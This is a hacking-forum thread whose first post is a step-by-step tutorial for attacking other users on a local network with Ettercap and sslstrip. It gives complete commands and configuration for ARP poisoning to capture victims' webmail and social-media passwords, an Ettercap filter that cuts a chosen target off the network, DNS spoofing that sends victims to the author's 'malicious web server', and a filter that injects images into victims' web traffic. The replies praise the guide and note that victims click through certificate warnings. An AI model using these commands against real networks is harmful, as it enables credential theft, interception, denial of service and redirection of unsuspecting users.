chevron_left chevron_right
Login Register invert_colors photo_library
Stay updated and chat with others! - Join the Discord or the IRC.
Thread Rating:
  • 0 Vote(s) - 0 Average


filter_list Ettercap Man In The MIddle Attack + SSL Strip
Author
Message
Ettercap Man In The MIddle Attack + SSL Strip #1
Ettercap Man In The Middle Attack + SSL strip

Only test this on your home network no where else. This guide is more of a reference for launching a man in the middle attack to view the traffic of victims on the network using ettercap along with sslstrip to strip out the important encrypted http traffic. I have done this on wired and wireless LANs using Backtrack5.

To begin we want to enable packet forwarding with this command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then cat the file to see if it is enabled or not. The command output of 1 meaning enabled and 0 meaning not enabled.

cat /proc/sys/net/ipv4/ip_forward

We will now edit our etter.conf configuratin file to use ip tables. In backtrack the file is located /etc/etter.conf
Uncomment the two commented lines following the statement: if you use iptables by removing the two bottom comment hashes you see below((remove the two bright red things) but make sure to leave the one beside the words "if you use ip tables":

#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

In the same file also change ec_uid and ec_gid numbers to zero so Ettercap runs as admin.

[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default



Now use this iptables command to adjust the nat table to route tcp traffic from 80 to 8080:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Once we have scanned the network for targets and are aware of what IP addresses belongs to what we can begin the poisoning by Becomeing Man in the middle. The following will start ettercap using a range of ip addresses along with the autoadd plugin which means victims who join the network or reconnect to it after you began the scan will be poisoned as well. In this example 192.168.1.1 is the router and ettercap will poison targets up to 192.168.1.5 Also if you are on a wireless network all you have to do is specify ettercap to use your wireless interface with -i wlan0 . wlan0 is my wireless interface.

sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoadd
or less specific. This poisons everyone in subnet but be careful this can bring a network to a crawl:
ettercap -TqM ARP:REMOTE // //

Now tell sslstrip to listen(-l) on p 8080:

sslstrip -a -l 8080

Now watch people's hotmail,facebook and any other passwords that are suppsoedly protected by ssl roll in as they login. Ettercap will display the output. Now lets dig deeper and manipulate people's packets as they are routed through our computer.


DOS Attacking with Ettercap


First off always re-enable packetforwarding because by default it will turn off when you stop an Ettercap poison. Here is the command:


echo 1 > /proc/sys/net/ipv4/ip_forward

Now lets do a DOS attack with ettercap. First thing we want to do is create a file with instructions to drop packets from and to a target host. Make a file called dos.eft
Put these lines of code in it but make sure to change both “Target IP” fields to that of your victim.

if (ip.src == ‘Target IP’ || ip.dst == ‘Target IP’) {
drop();
kill();
msg(“Packet Dropped\n”);
}


Go to the directory you saved your file/script in and compile it into an ettercap filter with this command:

etterfilter dos.eft -o dos.ef

Lastly we become man in the middle.
-F specifies what filter we want to use. In this case it’s dos.ef
I was targeting 192.168.1.112 so I chose it for this example:

ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)

You should see Ettercap displaying lots of “Packet Dropped” messages. ;-)


DNS Spoofing
(Redirecting victim to sites of our choosing with Ettercap)

Now lets redirect our victim to websites of our choosing. First open a new console and change to our dns configuration file located in the following directory:

/usr/share/ettercap

Enter the following command to open the configuration file so we can edit it, I use gedit to edit it but you can use many other programs such as kedit:

gedit etter.dns

Now see the line that says

microsoft.com A 198.182.196.56

That line will redirect the victim to 198.182.196.56 if they attempt to visit microsoft.com

I will give you an example by showing you I can redirect the victim to my own malicious web server running on my IP address (192.168.1.118) if they attempt to visit lets say www.facebook.com This example also uses a wildcard (*)We do this by adding the following line:

*.facebook.com A 192.168.1.118

Save it. Now We can issue the actual command that begins Ettercap and uses the dns spoofing addon:

ettercap -T -q -M arp:remote -P dns_spoof //

or if we want to target a specific victim IP address use this:

ettercap -i yourinterface -T -q -P dns_spoof -M ARP /herevictimslocalip/ //

Leave that running. The output that ettercap displays will clearly notify you as people are redirected.


Change pictures the victim sees as they browse the web

(using an Ettercap filter of course)


Ok this section I will teach you how to work with filters in Ettercap and ultimately change the pictures people see in there browser to ones we have selected. To create your own filters you need to learn the basics of how programming languages work but for this example I will give you one that I got from the helpful hackers at greyhat security.

Create/edit a new file using the following command:

gedit filter.pic

Copy and paste the following into it. But you must change the text in red to the url of your own images that you have uploaded using your favorite image uploader such as tinypic.com or imageshack.com

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("Modified Accept-Encoding!\n");
}
}

if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}

if (ip.proto == UDP && udp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}

Save and close. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:


etterfilter filter.pic -o filter.ef

Now we finally issue the Ettercap command that begins the MitmM attack and use the picture filter that we have created:

sudo ettercap -T -q -F filter.ef -M arp:remote // -P autoadd

----------------------------------------------------------------------

Note: Remember to enable packet forwarding before using any of attacks I mentioned in this guide. It was mentioned in the first tutorial (ssl strip tute) but here is the command again:

echo 1 > /proc/sys/net/ipv4/ip_forward








[Image: DOOM_banner.jpg]
A closed mouth says nothing wrong, A closed mind does nothing right.

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #2
Awesome Smile thanks!!!
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #3
How do i open ettercap and why should i use sll strip.

:rofl:

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #4
if we don't use ssl-strip, the browser will said there is smthing wrong with the certificates..
:8-s:
DOS Attacking with Ettercap---> I will try thiss....thank's :thumbs:

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #5
(04-16-2011, 01:38 AM)lagann Wrote: if we don't use ssl-strip, the browser will said there is smthing wrong with the certificates..
:8-s:
DOS Attacking with Ettercap---> I will try thiss....thank's :thumbs:

NP glad you like, I can add more to this guide too like how to redirect victims to different websites of your choosing or how to change all the pictures the victim sees as they browse the web if u want?

By the way the victims computer will still get a "are you sure you want to proceed anyway" message even if you use ssl strip. We can sucesfully strip the ssl out but we still dont have the legit ssl certificate. There are ways to make your own legit ones so that message does not prompt the user though I think.

The message differs depending on what browser the victim is using, nevertheless this works because most people will just click proceed anyway. Just make sure to use backtrack not another distro..for this guide anyways.
[Image: DOOM_banner.jpg]
A closed mouth says nothing wrong, A closed mind does nothing right.

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #6
(04-16-2011, 12:16 AM)enc0de Wrote: How do i open ettercap and why should i use sll strip.

:rofl:

hey I was just kidding but very nice tutorial 5 stars and a rep keep up the good work.

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #7
(04-16-2011, 04:20 PM)enc0de Wrote:
(04-16-2011, 12:16 AM)enc0de Wrote: How do i open ettercap and why should i use sll strip.

:rofl:

hey I was just kidding but very nice tutorial 5 stars and a rep keep up the good work.

hahaah yeah I firgured man Tongue . Thanks for the rep too! You will be repaid back double once I accumulate some more btw Wink
[Image: DOOM_banner.jpg]
A closed mouth says nothing wrong, A closed mind does nothing right.

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #8
(04-16-2011, 03:56 PM).LiT Wrote:
(04-16-2011, 01:38 AM)lagann Wrote: if we don't use ssl-strip, the browser will said there is smthing wrong with the certificates..
:8-s:
DOS Attacking with Ettercap---> I will try thiss....thank's :thumbs:

NP glad you like, I can add more to this guide too like how to redirect victims to different websites of your choosing or how to change all the pictures the victim sees as they browse the web if u want?

By the way the victims computer will still get a "are you sure you want to proceed anyway" message even if you use ssl strip. We can sucesfully strip the ssl out but we still dont have the legit ssl certificate. There are ways to make your own legit ones so that message does not prompt the user though I think.

The message differs depending on what browser the victim is using, nevertheless this works because most people will just click proceed anyway. Just make sure to use backtrack not another distro..for this guide anyways.

:rofl:....I'm not saying that I use ur ssl-strip ^_^' ...
but I like ur dos attcks :thumbs:


Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #9
i think that ettercap doesnt work on client isolation enabled APs/hotspots. please correct me if i am wrong. neither does wireshark. I can see only my own datas....but i found i can urlsnarf & driftnet by using airodump captured packages. and tcpdump seems to work too.. but not too sure about it, just used tcpdump a couple of days ago.. need to learn more about it.
YEAH YEAH.. GIVE ME NEGATIVE REP FOR SAYING TRUTH... BUT ANYWAY WHO CARES!!!. I AM WHO I AM...REPS DO NOT MATTER TO ME.. GIVE ME 1000 -ve REPS, but IF MY POST IS GOOD THEN READERS WILL KNOW

Reply

RE: Ettercap Man In The MIddle Attack + SSL Strip #10
(06-02-2011, 05:59 PM)deathknight Wrote: i think that ettercap doesnt work on client isolation enabled APs/hotspots. please correct me if i am wrong. neither does wireshark. I can see only my own datas....but i found i can urlsnarf & driftnet by using airodump captured packages. and tcpdump seems to work too.. but not too sure about it, just used tcpdump a couple of days ago.. need to learn more about it.

This is tried and tested using Backtrack on wired lans. Not wireless. Refer to Coder-San's wireless sniffing thread for that.
[Image: DOOM_banner.jpg]
A closed mouth says nothing wrong, A closed mind does nothing right.

Reply






Users browsing this thread: 1 Guest(s)